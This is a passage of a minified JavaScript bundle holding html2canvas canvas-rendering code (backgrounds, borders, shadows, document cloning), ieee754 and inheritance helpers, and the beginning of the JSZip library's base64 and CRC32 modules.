I(_e.bounds.left,_e.bounds.top+_n(_e.styles.paddingTop,_e.bounds.width),_e.bounds.width,tC(tt.lineHeight,tt.fontSize.number)/2+1),this.renderTextWithLetterSpacing(new Ff(ge.listValue,qa),tt.letterSpacing,tC(tt.lineHeight,tt.fontSize.number)/2+2),this.ctx.textBaseline="bottom",this.ctx.textAlign="left"),Qi.label=20;case 20:return[2]}})})},ce.prototype.renderStackContent=function(ge){return j(this,void 0,void 0,function(){var _e,je,tt,dt,_t,gt,kt,Lt,Ht,ui,Ki,Ni,Ui,dn;return $(this,function(na){switch(na.label){case 0:return Tr(ge.element.container.flags,16),[4,this.renderNodeBackgroundAndBorders(ge.element)];case 1:na.sent(),_e=0,je=ge.negativeZIndex,na.label=2;case 2:return _e<je.length?[4,this.renderStack(je[_e])]:[3,5];case 3:na.sent(),na.label=4;case 4:return _e++,[3,2];case 5:return[4,this.renderNodeContent(ge.element)];case 6:na.sent(),tt=0,dt=ge.nonInlineLevel,na.label=7;case 7:return tt<dt.length?[4,this.renderNode(dt[tt])]:[3,10];case 8:na.sent(),na.label=9;case 9:return tt++,[3,7];case 10:_t=0,gt=ge.nonPositionedFloats,na.label=11;case 11:return _t<gt.length?[4,this.renderStack(gt[_t])]:[3,14];case 12:na.sent(),na.label=13;case 13:return _t++,[3,11];case 14:kt=0,Lt=ge.nonPositionedInlineLevel,na.label=15;case 15:return kt<Lt.length?[4,this.renderStack(Lt[kt])]:[3,18];case 16:na.sent(),na.label=17;case 17:return kt++,[3,15];case 18:Ht=0,ui=ge.inlineLevel,na.label=19;case 19:return Ht<ui.length?[4,this.renderNode(ui[Ht])]:[3,22];case 20:na.sent(),na.label=21;case 21:return Ht++,[3,19];case 22:Ki=0,Ni=ge.zeroOrAutoZIndexOrTransformedOrOpacity,na.label=23;case 23:return Ki<Ni.length?[4,this.renderStack(Ni[Ki])]:[3,26];case 24:na.sent(),na.label=25;case 25:return Ki++,[3,23];case 26:Ui=0,dn=ge.positiveZIndex,na.label=27;case 27:return Ui<dn.length?[4,this.renderStack(dn[Ui])]:[3,30];case 28:na.sent(),na.label=29;case 29:return Ui++,[3,27];case 30:return[2]}})})},ce.prototype.mask=function(ge){this.ctx.beginPath(),this.ctx.moveTo(0,0),this.ctx.lineTo(this.canvas.width,0),this.ctx.lineTo(this.canvas.width,this.canvas.height),this.ctx.lineTo(0,this.canvas.height),this.ctx.lineTo(0,0),this.formatPath(ge.slice(0).reverse()),this.ctx.closePath()},ce.prototype.path=function(ge){this.ctx.beginPath(),this.formatPath(ge),this.ctx.closePath()},ce.prototype.formatPath=function(ge){var _e=this;ge.forEach(function(je,tt){var dt=bl(je)?je.start:je;0===tt?_e.ctx.moveTo(dt.x,dt.y):_e.ctx.lineTo(dt.x,dt.y),bl(je)&&_e.ctx.bezierCurveTo(je.startControl.x,je.startControl.y,je.endControl.x,je.endControl.y,je.end.x,je.end.y)})},ce.prototype.renderRepeat=function(ge,_e,je,tt){this.path(ge),this.ctx.fillStyle=_e,this.ctx.translate(je,tt),this.ctx.fill(),this.ctx.translate(-je,-tt)},ce.prototype.resizeImage=function(ge,_e,je){var tt;if(ge.width===_e&&ge.height===je)return ge;var _t=(null!==(tt=this.canvas.ownerDocument)&&void 0!==tt?tt:document).createElement("canvas");return _t.width=Math.max(1,_e),_t.height=Math.max(1,je),_t.getContext("2d").drawImage(ge,0,0,ge.width,ge.height,0,0,_e,je),_t},ce.prototype.renderBackgroundImage=function(ge){return j(this,void 0,void 0,function(){var _e,je,tt,dt,_t;return $(this,function(kt){switch(kt.label){case 0:_e=ge.styles.backgroundImage.length-1,je=function(Lt){var Ht,ui,Ki,Ni,Ui,dn,ta,na,To,Mn,qa,Qi,ro,Yn,Ka,Sr,qc,Gc,On,Ps,jc,mi,yc,Qf,qs,wr,_h,gh,nc,Ch,Ul;return $(this,function($f){switch($f.label){case 0:if(0!==Lt.type)return[3,5];Ht=void 0,ui=Lt.url,$f.label=1;case 1:return $f.trys.push([1,3,,4]),[4,tt.context.cache.match(ui)];case 2:return Ht=$f.sent(),[3,4];case 3:return $f.sent(),tt.context.logger.error("Error loading background-image "+ui),[3,4];case 4:return Ht&&(Ki=G_(ge,_e,[Ht.width,Ht.height,Ht.width/Ht.height]),Sr=Ki[0],mi=Ki[1],yc=Ki[2],Yn=tt.ctx.createPattern(tt.resizeImage(Ht,On=Ki[3],Ps=Ki[4]),"repeat"),tt.renderRepeat(Sr,Yn,mi,yc)),[3,6];case 5:!function(fe){return 1===fe.type}(Lt)?function(fe){return 2===fe.type}(Lt)&&(Ka=G_(ge,_e,[null,null,null]),Sr=Ka[0],qc=Ka[1],Gc=Ka[2],Ps=Ka[4],mi=_n((jc=0===Lt.position.length?[Vi]:Lt.position)[0],On=Ka[3]),yc=_n(jc[jc.length-1],Ps),Qf=function(fe,ce,ge,_e,je){var tt=0,dt=0;switch(fe.size){case 0:0===fe.shape?tt=dt=Math.min(Math.abs(ce),Math.abs(ce-_e),Math.abs(ge),Math.abs(ge-je)):1===fe.shape&&(tt=Math.min(Math.abs(ce),Math.abs(ce-_e)),dt=Math.min(Math.abs(ge),Math.abs(ge-je)));break;case 2:if(0===fe.shape)tt=dt=Math.min(gr(ce,ge),gr(ce,ge-je),gr(ce-_e,ge),gr(ce-_e,ge-je));else if(1===fe.shape){var _t=Math.min(Math.abs(ge),Math.abs(ge-je))/Math.min(Math.abs(ce),Math.abs(ce-_e)),gt=s0(_e,je,ce,ge,!0);dt=_t*(tt=gr(gt[0]-ce,(gt[1]-ge)/_t))}break;case 1:0===fe.shape?tt=dt=Math.max(Math.abs(ce),Math.abs(ce-_e),Math.abs(ge),Math.abs(ge-je)):1===fe.shape&&(tt=Math.max(Math.abs(ce),Math.abs(ce-_e)),dt=Math.max(Math.abs(ge),Math.abs(ge-je)));break;case 3:if(0===fe.shape)tt=dt=Math.max(gr(ce,ge),gr(ce,ge-je),gr(ce-_e,ge),gr(ce-_e,ge-je));else if(1===fe.shape){_t=Math.max(Math.abs(ge),Math.abs(ge-je))/Math.max(Math.abs(ce),Math.abs(ce-_e));var Ht=s0(_e,je,ce,ge,!1);dt=_t*(tt=gr(Ht[0]-ce,(Ht[1]-ge)/_t))}}return Array.isArray(fe.size)&&(tt=_n(fe.size[0],_e),dt=2===fe.size.length?_n(fe.size[1],je):tt),[tt,dt]}(Lt,mi,yc,On,Ps),wr=Qf[1],(qs=Qf[0])>0&&wr>0&&(_h=tt.ctx.createRadialGradient(qc+mi,Gc+yc,0,qc+mi,Gc+yc,qs),Gu(Lt.stops,2*qs).forEach(function(Q_){return _h.addColorStop(Q_.stop,tr(Q_.color))}),tt.path(Sr),tt.ctx.fillStyle=_h,qs!==wr?(gh=ge.bounds.left+.5*ge.bounds.width,nc=ge.bounds.top+.5*ge.bounds.height,Ul=1/(Ch=wr/qs),tt.ctx.save(),tt.ctx.translate(gh,nc),tt.ctx.transform(1,0,0,Ch,0,0),tt.ctx.translate(-gh,-nc),tt.ctx.fillRect(qc,Ul*(Gc-nc)+nc,On,Ps*Ul),tt.ctx.restore()):tt.ctx.fill())):(Ni=G_(ge,_e,[null,null,null]),Sr=Ni[0],mi=Ni[1],yc=Ni[2],Ui=uc(Lt.angle,On=Ni[3],Ps=Ni[4]),dn=Ui[0],ta=Ui[1],na=Ui[2],To=Ui[3],Mn=Ui[4],(qa=document.createElement("canvas")).width=On,qa.height=Ps,Qi=qa.getContext("2d"),ro=Qi.createLinearGradient(ta,To,na,Mn),Gu(Lt.stops,dn).forEach(function(Q_){return ro.addColorStop(Q_.stop,tr(Q_.color))}),Qi.fillStyle=ro,Qi.fillRect(0,0,On,Ps),On>0&&Ps>0&&(Yn=tt.ctx.createPattern(qa,"repeat"),tt.renderRepeat(Sr,Yn,mi,yc))),$f.label=6;case 6:return _e--,[2]}})},tt=this,dt=0,_t=ge.styles.backgroundImage.slice(0).reverse(),kt.label=1;case 1:return dt<_t.length?[5,je(_t[dt])]:[3,4];case 2:kt.sent(),kt.label=3;case 3:return dt++,[3,1];case 4:return[2]}})})},ce.prototype.renderSolidBorder=function(ge,_e,je){return j(this,void 0,void 0,function(){return $(this,function(tt){return this.path(hE(je,_e)),this.ctx.fillStyle=tr(ge),this.ctx.fill(),[2]})})},ce.prototype.renderDoubleBorder=function(ge,_e,je,tt){return j(this,void 0,void 0,function(){var dt,_t;return $(this,function(gt){switch(gt.label){case 0:return _e<3?[4,this.renderSolidBorder(ge,je,tt)]:[3,2];case 1:return gt.sent(),[2];case 2:return dt=function(fe,ce){switch(ce){case 0:return Ml(fe.topLeftBorderBox,fe.topLeftBorderDoubleOuterBox,fe.topRightBorderBox,fe.topRightBorderDoubleOuterBox);case 1:return Ml(fe.topRightBorderBox,fe.topRightBorderDoubleOuterBox,fe.bottomRightBorderBox,fe.bottomRightBorderDoubleOuterBox);case 2:return Ml(fe.bottomRightBorderBox,fe.bottomRightBorderDoubleOuterBox,fe.bottomLeftBorderBox,fe.bottomLeftBorderDoubleOuterBox);default:return Ml(fe.bottomLeftBorderBox,fe.bottomLeftBorderDoubleOuterBox,fe.topLeftBorderBox,fe.topLeftBorderDoubleOuterBox)}}(tt,je),this.path(dt),this.ctx.fillStyle=tr(ge),this.ctx.fill(),_t=function(fe,ce){switch(ce){case 0:return Ml(fe.topLeftBorderDoubleInnerBox,fe.topLeftPaddingBox,fe.topRightBorderDoubleInnerBox,fe.topRightPaddingBox);case 1:return Ml(fe.topRightBorderDoubleInnerBox,fe.topRightPaddingBox,fe.bottomRightBorderDoubleInnerBox,fe.bottomRightPaddingBox);case 2:return Ml(fe.bottomRightBorderDoubleInnerBox,fe.bottomRightPaddingBox,fe.bottomLeftBorderDoubleInnerBox,fe.bottomLeftPaddingBox);default:return Ml(fe.bottomLeftBorderDoubleInnerBox,fe.bottomLeftPaddingBox,fe.topLeftBorderDoubleInnerBox,fe.topLeftPaddingBox)}}(tt,je),this.path(_t),this.ctx.fill(),[2]}})})},ce.prototype.renderNodeBackgroundAndBorders=function(ge){return j(this,void 0,void 0,function(){var _e,je,tt,dt,_t,gt,kt,Lt,Ht=this;return $(this,function(ui){switch(ui.label){case 0:return this.applyEffects(ge.getEffects(2)),je=!Oc((_e=ge.container.styles).backgroundColor)||_e.backgroundImage.length,tt=[{style:_e.borderTopStyle,color:_e.borderTopColor,width:_e.borderTopWidth},{style:_e.borderRightStyle,color:_e.borderRightColor,width:_e.borderRightWidth},{style:_e.borderBottomStyle,color:_e.borderBottomColor,width:_e.borderBottomWidth},{style:_e.borderLeftStyle,color:_e.borderLeftColor,width:_e.borderLeftWidth}],dt=B7(jf(_e.backgroundClip,0),ge.curves),je||_e.boxShadow.length?(this.ctx.save(),this.path(dt),this.ctx.clip(),Oc(_e.backgroundColor)||(this.ctx.fillStyle=tr(_e.backgroundColor),this.ctx.fill()),[4,this.renderBackgroundImage(ge.container)]):[3,2];case 1:ui.sent(),this.ctx.restore(),_e.boxShadow.slice(0).reverse().forEach(function(Ki){Ht.ctx.save();var Ni=U_(ge.curves),Ui=Ki.inset?0:1e4,dn=function(fe,ce,ge,_e,je){return fe.map(function(tt,dt){switch(dt){case 0:return tt.add(ce,ge);case 1:return tt.add(ce+_e,ge);case 2:return tt.add(ce+_e,ge+je);case 3:return tt.add(ce,ge+je)}return tt})}(Ni,(Ki.inset?1:-1)*Ki.spread.number-Ui,(Ki.inset?1:-1)*Ki.spread.number,Ki.spread.number*(Ki.inset?-2:2),Ki.spread.number*(Ki.inset?-2:2));Ki.inset?(Ht.path(Ni),Ht.ctx.clip(),Ht.mask(dn)):(Ht.mask(Ni),Ht.ctx.clip(),Ht.path(dn)),Ht.ctx.shadowOffsetX=Ki.offsetX.number+Ui,Ht.ctx.shadowOffsetY=Ki.offsetY.number,Ht.ctx.shadowColor=tr(Ki.color),Ht.ctx.shadowBlur=Ki.blur.number,Ht.ctx.fillStyle=Ki.inset?tr(Ki.color):"rgba(0,0,0,1)",Ht.ctx.fill(),Ht.ctx.restore()}),ui.label=2;case 2:_t=0,gt=0,kt=tt,ui.label=3;case 3:return gt<kt.length?0!==(Lt=kt[gt]).style&&!Oc(Lt.color)&&Lt.width>0?2!==Lt.style?[3,5]:[4,this.renderDashedDottedBorder(Lt.color,Lt.width,_t,ge.curves,2)]:[3,11]:[3,13];case 4:return ui.sent(),[3,11];case 5:return 3!==Lt.style?[3,7]:[4,this.renderDashedDottedBorder(Lt.color,Lt.width,_t,ge.curves,3)];case 6:return ui.sent(),[3,11];case 7:return 4!==Lt.style?[3,9]:[4,this.renderDoubleBorder(Lt.color,Lt.width,_t,ge.curves)];case 8:return ui.sent(),[3,11];case 9:return[4,this.renderSolidBorder(Lt.color,_t,ge.curves)];case 10:ui.sent(),ui.label=11;case 11:_t++,ui.label=12;case 12:return gt++,[3,3];case 13:return[2]}})})},ce.prototype.renderDashedDottedBorder=function(ge,_e,je,tt,dt){return j(this,void 0,void 0,function(){var _t,gt,kt,Lt,Ht,ui,Ki,Ni,Ui,dn,ta,na,To,Mn,qa,Qi;return $(this,function(ro){return this.ctx.save(),_t=function(fe,ce){switch(ce){case 0:return U0(fe.topLeftBorderStroke,fe.topRightBorderStroke);case 1:return U0(fe.topRightBorderStroke,fe.bottomRightBorderStroke);case 2:return U0(fe.bottomRightBorderStroke,fe.bottomLeftBorderStroke);default:return U0(fe.bottomLeftBorderStroke,fe.topLeftBorderStroke)}}(tt,je),gt=hE(tt,je),2===dt&&(this.path(gt),this.ctx.clip()),bl(gt[0])?(kt=gt[0].start.x,Lt=gt[0].start.y):(kt=gt[0].x,Lt=gt[0].y),bl(gt[1])?(Ht=gt[1].end.x,ui=gt[1].end.y):(Ht=gt[1].x,ui=gt[1].y),Ki=0===je||2===je?Math.abs(kt-Ht):Math.abs(Lt-ui),this.ctx.beginPath(),this.formatPath(3===dt?_t:gt.slice(0,2)),Ni=_e<3?3*_e:2*_e,Ui=_e<3?2*_e:_e,3===dt&&(Ni=_e,Ui=_e),dn=!0,Ki<=2*Ni?dn=!1:Ki<=2*Ni+Ui?(Ni*=ta=Ki/(2*Ni+Ui),Ui*=ta):(na=Math.floor((Ki+Ui)/(Ni+Ui)),To=(Ki-na*Ni)/(na-1),Ui=(Mn=(Ki-(na+1)*Ni)/na)<=0||Math.abs(Ui-To)<Math.abs(Ui-Mn)?To:Mn),dn&&this.ctx.setLineDash(3===dt?[0,Ni+Ui]:[Ni,Ui]),3===dt?(this.ctx.lineCap="round",this.ctx.lineWidth=_e):this.ctx.lineWidth=2*_e+1.1,this.ctx.strokeStyle=tr(ge),this.ctx.stroke(),this.ctx.setLineDash([]),2===dt&&(bl(gt[0])&&(qa=gt[3],Qi=gt[0],this.ctx.beginPath(),this.formatPath([new Fi(qa.end.x,qa.end.y),new Fi(Qi.start.x,Qi.start.y)]),this.ctx.stroke()),bl(gt[1])&&(qa=gt[1],Qi=gt[2],this.ctx.beginPath(),this.formatPath([new Fi(qa.end.x,qa.end.y),new Fi(Qi.start.x,Qi.start.y)]),this.ctx.stroke())),this.ctx.restore(),[2]})})},ce.prototype.render=function(ge){return j(this,void 0,void 0,function(){var _e;return $(this,function(je){switch(je.label){case 0:return this.options.backgroundColor&&(this.ctx.fillStyle=tr(this.options.backgroundColor),this.ctx.fillRect(this.options.x,this.options.y,this.options.width,this.options.height)),_e=function(fe){var ce=new uE(fe,null),ge=new mE(ce),_e=[];return ZM(ce,ge,ge,_e),H0(ce.container,_e),ge}(ge),[4,this.renderStack(_e)];case 1:return je.sent(),this.applyEffects([]),[2,this.canvas]}})})},ce}(nv),V7=function(fe){return fe instanceof N0||fe instanceof fd||fe instanceof L_&&fe.type!==_s&&fe.type!==sh},B7=function(fe,ce){switch(fe){case 0:return U_(ce);case 2:return function(fe){return[fe.topLeftContentBox,fe.topRightContentBox,fe.bottomRightContentBox,fe.bottomLeftContentBox]}(ce);default:return F0(ce)}},j_=function(fe){switch(fe){case 1:return"center";case 2:return"right";default:return"left"}},OC=["-apple-system","system-ui"],ov=function(fe){return/iPhone OS 15_(0|1)/.test(window.navigator.userAgent)?fe.filter(function(ce){return-1===OC.indexOf(ce)}):fe},rv=function(fe){function ce(ge,_e){var je=fe.call(this,ge,_e)||this;return je.canvas=_e.canvas?_e.canvas:document.createElement("canvas"),je.ctx=je.canvas.getContext("2d"),je.options=_e,je.canvas.width=Math.floor(_e.width*_e.scale),je.canvas.height=Math.floor(_e.height*_e.scale),je.canvas.style.width=_e.width+"px",je.canvas.style.height=_e.height+"px",je.ctx.scale(je.options.scale,je.options.scale),je.ctx.translate(-_e.x,-_e.y),je.context.logger.debug("EXPERIMENTAL ForeignObject renderer initialized ("+_e.width+"x"+_e.height+" at "+_e.x+","+_e.y+") with scale "+_e.scale),je}return de(ce,fe),ce.prototype.render=function(ge){return j(this,void 0,void 0,function(){var _e,je;return $(this,function(tt){switch(tt.label){case 0:return _e=O0(this.options.width*this.options.scale,this.options.height*this.options.scale,this.options.scale,this.options.scale,ge),[4,sv(_e)];case 1:return je=tt.sent(),this.options.backgroundColor&&(this.ctx.fillStyle=tr(this.options.backgroundColor),this.ctx.fillRect(0,0,this.options.width*this.options.scale,this.options.height*this.options.scale)),this.ctx.drawImage(je,-this.options.x*this.options.scale,-this.options.y*this.options.scale),[2,this.canvas]}})})},ce}(nv),sv=function(fe){return new Promise(function(ce,ge){var _e=new Image;_e.onload=function(){ce(_e)},_e.onerror=ge,_e.src="data:image/svg+xml;charset=utf-8,"+encodeURIComponent((new XMLSerializer).serializeToString(fe))})},CE=function(){function fe(ce){var _e=ce.enabled;this.id=ce.id,this.enabled=_e,this.start=Date.now()}return fe.prototype.debug=function(){for(var ce=[],ge=0;ge<arguments.length;ge++)ce[ge]=arguments[ge];this.enabled&&("undefined"!=typeof window&&window.console&&"function"==typeof console.debug?console.debug.apply(console,ae([this.id,this.getTime()+"ms"],ce)):this.info.apply(this,ce))},fe.prototype.getTime=function(){return Date.now()-this.start},fe.prototype.info=function(){for(var ce=[],ge=0;ge<arguments.length;ge++)ce[ge]=arguments[ge];this.enabled&&"undefined"!=typeof window&&window.console&&"function"==typeof console.info&&console.info.apply(console,ae([this.id,this.getTime()+"ms"],ce))},fe.prototype.warn=function(){for(var ce=[],ge=0;ge<arguments.length;ge++)ce[ge]=arguments[ge];this.enabled&&("undefined"!=typeof window&&window.console&&"function"==typeof console.warn?console.warn.apply(console,ae([this.id,this.getTime()+"ms"],ce)):this.info.apply(this,ce))},fe.prototype.error=function(){for(var ce=[],ge=0;ge<arguments.length;ge++)ce[ge]=arguments[ge];this.enabled&&("undefined"!=typeof window&&window.console&&"function"==typeof console.error?console.error.apply(console,ae([this.id,this.getTime()+"ms"],ce)):this.info.apply(this,ce))},fe.instances={},fe}(),cv=function(){function fe(ce,ge){var _e;this.windowBounds=ge,this.instanceName="#"+fe.instanceCount++,this.logger=new CE({id:this.instanceName,enabled:ce.logging}),this.cache=null!==(_e=ce.cache)&&void 0!==_e?_e:new KM(this,ce)}return fe.instanceCount=1,fe}();"undefined"!=typeof window&&wC.setContext(window);var NC=function(fe,ce){return j(void 0,void 0,void 0,function(){var ge,_e,je,tt,dt,_t,gt,kt,Lt,Ht,ui,Ki,Ni,Ui,dn,ta,na,To,Mn,qa,Qi,Yn,Ka,Sr,qc,Gc,On,Ps,jc,mi,yc,Qf,qs,wr,_h,gh,nc,Ch;return $(this,function(Ul){switch(Ul.label){case 0:if(!fe||"object"!=typeof fe)return[2,Promise.reject("Invalid element provided as first argument")];if(!(ge=fe.ownerDocument))throw new Error("Element is not attached to a Document");if(!(_e=ge.defaultView))throw new Error("Document is not attached to a Window");return je={allowTaint:null!==(Yn=ce.allowTaint)&&void 0!==Yn&&Yn,imageTimeout:null!==(Ka=ce.imageTimeout)&&void 0!==Ka?Ka:15e3,proxy:ce.proxy,useCORS:null!==(Sr=ce.useCORS)&&void 0!==Sr&&Sr},tt=ie({logging:null===(qc=ce.logging)||void 0===qc||qc,cache:ce.cache},je),dt={windowWidth:null!==(Gc=ce.windowWidth)&&void 0!==Gc?Gc:_e.innerWidth,windowHeight:null!==(On=ce.windowHeight)&&void 0!==On?On:_e.innerHeight,scrollX:null!==(Ps=ce.scrollX)&&void 0!==Ps?Ps:_e.pageXOffset,scrollY:null!==(jc=ce.scrollY)&&void 0!==jc?jc:_e.pageYOffset},_t=new I(dt.scrollX,dt.scrollY,dt.windowWidth,dt.windowHeight),gt=new cv(tt,_t),kt=null!==(mi=ce.foreignObjectRendering)&&void 0!==mi&&mi,Lt={allowTaint:null!==(yc=ce.allowTaint)&&void 0!==yc&&yc,onclone:ce.onclone,ignoreElements:ce.ignoreElements,inlineImages:kt,copyStyles:kt},gt.logger.debug("Starting document clone with size "+_t.width+"x"+_t.height+" scrolled to "+-_t.left+","+-_t.top),Ht=new B_(gt,fe,Lt),(ui=Ht.clonedReferenceElement)?[4,Ht.toIFrame(ge,_t)]:[2,Promise.reject("Unable to find element in cloned iframe")];case 1:return Ki=Ul.sent(),Ni=sr(ui)||function(fe){return"HTML"===fe.tagName}(ui)?function(fe){var ce=fe.body,ge=fe.documentElement;if(!ce||!ge)throw new Error("Unable to get document size");var _e=Math.max(Math.max(ce.scrollWidth,ge.scrollWidth),Math.max(ce.offsetWidth,ge.offsetWidth),Math.max(ce.clientWidth,ge.clientWidth)),je=Math.max(Math.max(ce.scrollHeight,ge.scrollHeight),Math.max(ce.offsetHeight,ge.offsetHeight),Math.max(ce.clientHeight,ge.clientHeight));return new I(0,0,_e,je)}(ui.ownerDocument):Q(gt,ui),Ui=Ni.width,dn=Ni.height,ta=Ni.left,na=Ni.top,To=H7(gt,ui,ce.backgroundColor),Mn={canvas:ce.canvas,backgroundColor:To,scale:null!==(qs=null!==(Qf=ce.scale)&&void 0!==Qf?Qf:_e.devicePixelRatio)&&void 0!==qs?qs:1,x:(null!==(wr=ce.x)&&void 0!==wr?wr:0)+ta,y:(null!==(_h=ce.y)&&void 0!==_h?_h:0)+na,width:null!==(gh=ce.width)&&void 0!==gh?gh:Math.ceil(Ui),height:null!==(nc=ce.height)&&void 0!==nc?nc:Math.ceil(dn)},kt?(gt.logger.debug("Document cloned, using foreign object rendering"),[4,new rv(gt,Mn).render(ui)]):[3,3];case 2:return qa=Ul.sent(),[3,5];case 3:return gt.logger.debug("Document cloned, element located at "+ta+","+na+" with size "+Ui+"x"+dn+" using computed rendering"),gt.logger.debug("Starting DOM parsing"),Qi=Ce(gt,ui),To===Qi.styles.backgroundColor&&(Qi.styles.backgroundColor=Nc.TRANSPARENT),gt.logger.debug("Starting renderer for element at "+Mn.x+","+Mn.y+" with size "+Mn.width+"x"+Mn.height),[4,new gE(gt,Mn).render(Qi)];case 4:qa=Ul.sent(),Ul.label=5;case 5:return(!(null!==(Ch=ce.removeContainer)&&void 0!==Ch)||Ch)&&(B_.destroy(Ki)||gt.logger.error("Cannot detach cloned iframe as it is not in the DOM anymore")),gt.logger.debug("Finished rendering"),[2,qa]}})})},H7=function(fe,ce,ge){var _e=ce.ownerDocument,je=_e.documentElement?uo(fe,getComputedStyle(_e.documentElement).backgroundColor):Nc.TRANSPARENT,tt=_e.body?uo(fe,getComputedStyle(_e.body).backgroundColor):Nc.TRANSPARENT,dt="string"==typeof ge?uo(fe,ge):null===ge?Nc.TRANSPARENT:4294967295;return ce===_e.documentElement?Oc(je)?Oc(tt)?dt:tt:je:dt};return function(fe,ce){return void 0===ce&&(ce={}),NC(fe,ce)}}()},4794:(Pe,we)=>{we.read=function(de,ie,j,$,ae){var I,Q,F=8*ae-$-1,E=(1<<F)-1,g=E>>1,b=-7,_=j?ae-1:0,y=j?-1:1,M=de[ie+_];for(_+=y,I=M&(1<<-b)-1,M>>=-b,b+=F;b>0;I=256*I+de[ie+_],_+=y,b-=8);for(Q=I&(1<<-b)-1,I>>=-b,b+=$;b>0;Q=256*Q+de[ie+_],_+=y,b-=8);if(0===I)I=1-g;else{if(I===E)return Q?NaN:1/0*(M?-1:1);Q+=Math.pow(2,$),I-=g}return(M?-1:1)*Q*Math.pow(2,I-$)},we.write=function(de,ie,j,$,ae,I){var Q,F,E,g=8*I-ae-1,b=(1<<g)-1,_=b>>1,y=23===ae?Math.pow(2,-24)-Math.pow(2,-77):0,M=$?0:I-1,p=$?1:-1,D=ie<0||0===ie&&1/ie<0?1:0;for(ie=Math.abs(ie),isNaN(ie)||ie===1/0?(F=isNaN(ie)?1:0,Q=b):(Q=Math.floor(Math.log(ie)/Math.LN2),ie*(E=Math.pow(2,-Q))<1&&(Q--,E*=2),(ie+=Q+_>=1?y/E:y*Math.pow(2,1-_))*E>=2&&(Q++,E/=2),Q+_>=b?(F=0,Q=b):Q+_>=1?(F=(ie*E-1)*Math.pow(2,ae),Q+=_):(F=ie*Math.pow(2,_-1)*Math.pow(2,ae),Q=0));ae>=8;de[j+M]=255&F,M+=p,F/=256,ae-=8);for(Q=Q<<ae|F,g+=ae;g>0;de[j+M]=255&Q,M+=p,Q/=256,g-=8);de[j+M-p]|=128*D}},2270:Pe=>{Pe.exports="function"==typeof Object.create?function(de,ie){ie&&(de.super_=ie,de.prototype=Object.create(ie.prototype,{constructor:{value:de,enumerable:!1,writable:!0,configurable:!0}}))}:function(de,ie){if(ie){de.super_=ie;var j=function(){};j.prototype=ie.prototype,de.prototype=new j,de.prototype.constructor=de}}},7729:Pe=>{"use strict";Pe.exports=function(de){return null!=de&&"object"==typeof de&&!1===Array.isArray(de)}},7040:(Pe,we,de)=>{var ie=de(5449).Buffer,j=de(5486);Pe.exports=function $(ae,I,Q){function F(b,_){if(!I[b]){if(!ae[b]){if(E)return E(b,!0);var M=new Error("Cannot find module '"+b+"'");throw M.code="MODULE_NOT_FOUND",M}var p=I[b]={exports:{}};ae[b][0].call(p.exports,function(D){return F(ae[b][1][D]||D)},p,p.exports,$,ae,I,Q)}return I[b].exports}for(var E=void 0,g=0;g<Q.length;g++)F(Q[g]);return F}({1:[function($,ae,I){"use strict";var Q=$("./utils"),F=$("./support"),E="ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/=";I.encode=function(g){for(var b,_,y,p,D,w,x=[],S=0,O=g.length,U=O,K="string"!==Q.getTypeOf(g);S<g.length;)U=O-S,y=K?(b=g[S++],_=S<O?g[S++]:0,S<O?g[S++]:0):(b=g.charCodeAt(S++),_=S<O?g.charCodeAt(S++):0,S<O?g.charCodeAt(S++):0),p=(3&b)<<4|_>>4,D=1<U?(15&_)<<2|y>>6:64,w=2<U?63&y:64,x.push(E.charAt(b>>2)+E.charAt(p)+E.charAt(D)+E.charAt(w));return x.join("")},I.decode=function(g){var b,_,y,M,p,D,w=0,x=0,S="data:";if(g.substr(0,S.length)===S)throw new Error("Invalid base64 input, it looks like a data url.");var O,U=3*(g=g.replace(/[^A-Za-z0-9+/=]/g,"")).length/4;if(g.charAt(g.length-1)===E.charAt(64)&&U--,g.charAt(g.length-2)===E.charAt(64)&&U--,U%1!=0)throw new Error("Invalid base64 input, bad content length.");for(O=F.uint8array?new Uint8Array(0|U):new Array(0|U);w<g.length;)b=E.indexOf(g.charAt(w++))<<2|(M=E.indexOf(g.charAt(w++)))>>4,_=(15&M)<<4|(p=E.indexOf(g.charAt(w++)))>>2,y=(3&p)<<6|(D=E.indexOf(g.charAt(w++))),O[x++]=b,64!==p&&(O[x++]=_),64!==D&&(O[x++]=y);return O}},{"./support":30,"./utils":32}],2:[function($,ae,I){"use strict";var Q=$("./external"),F=$("./stream/DataWorker"),E=$("./stream/Crc32Probe"),g=$("./stream/DataLengthProbe");function b(_,y,M,p,D){this.compressedSize=_,this.uncompressedSize=y,this.crc32=M,this.compression=p,this.compressedContent=D}b.prototype={getContentWorker:function(){var _=new F(Q.Promise.resolve(this.compressedContent)).pipe(this.compression.uncompressWorker()).pipe(new g("data_length")),y=this;return _.on("end",function(){if(this.streamInfo.data_length!==y.uncompressedSize)throw new Error("Bug : uncompressed data size mismatch")}),_},getCompressedWorker:function(){return new F(Q.Promise.resolve(this.compressedContent)).withStreamInfo("compressedSize",this.compressedSize).withStreamInfo("uncompressedSize",this.uncompressedSize).withStreamInfo("crc32",this.crc32).withStreamInfo("compression",this.compression)}},b.createWorkerFrom=function(_,y,M){return _.pipe(new E).pipe(new g("uncompressedSize")).pipe(y.compressWorker(M)).pipe(new g("compressedSize")).withStreamInfo("compression",y)},ae.exports=b},{"./external":6,"./stream/Crc32Probe":25,"./stream/DataLengthProbe":26,"./stream/DataWorker":27}],3:[function($,ae,I){"use strict";var Q=$("./stream/GenericWorker");I.STORE={magic:"\0\0",compressWorker:function(){return new Q("STORE compression")},uncompressWorker:function(){return new Q("STORE decompression")}},I.DEFLATE=$("./flate")},{"./flate":7,"./stream/GenericWorker":28}],4:[function($,ae,I){"use strict";var Q=$("./utils"),F=function(){for(var E,g=[],b=0;b<256;b++){E=b;for(var _=0;_<8;_++)E=1&E?3988292384^E>>>1:E>>>1;g[b]=E}return g}();ae.exports=function(E,g){return void 0!==E&&E.length?"string"!==Q.getTypeOf(E)?function(b,_,y,M){var p=F,D=0+y;b^=-1;for(var w=0;w<D;w++)b=b>>>8^p[255&(b^_[w])];return-1^b}(0|g,E,E.length):function(b,_,y,M){var p=F,D=0+y;b^=-1;for(var w=0;w<D;w++)b=b>>>8^p[255&(b^_.charCodeAt(w))];return-1^b}(0|g,E,E.length):0}},{"./utils":32}],5:[function($,ae,I){"use strict";I.base64=!1,I.binary=!1,I.dir=!1,I.createFolders=!0,I.date=null,I.compression=null,I.compressionOptions=null,I.comment=null,I.unixPermissions=null,I.dosPermissions=null},{}],6:[function($,ae,I){"use strict";var Q;Q="undefined"!=typeof 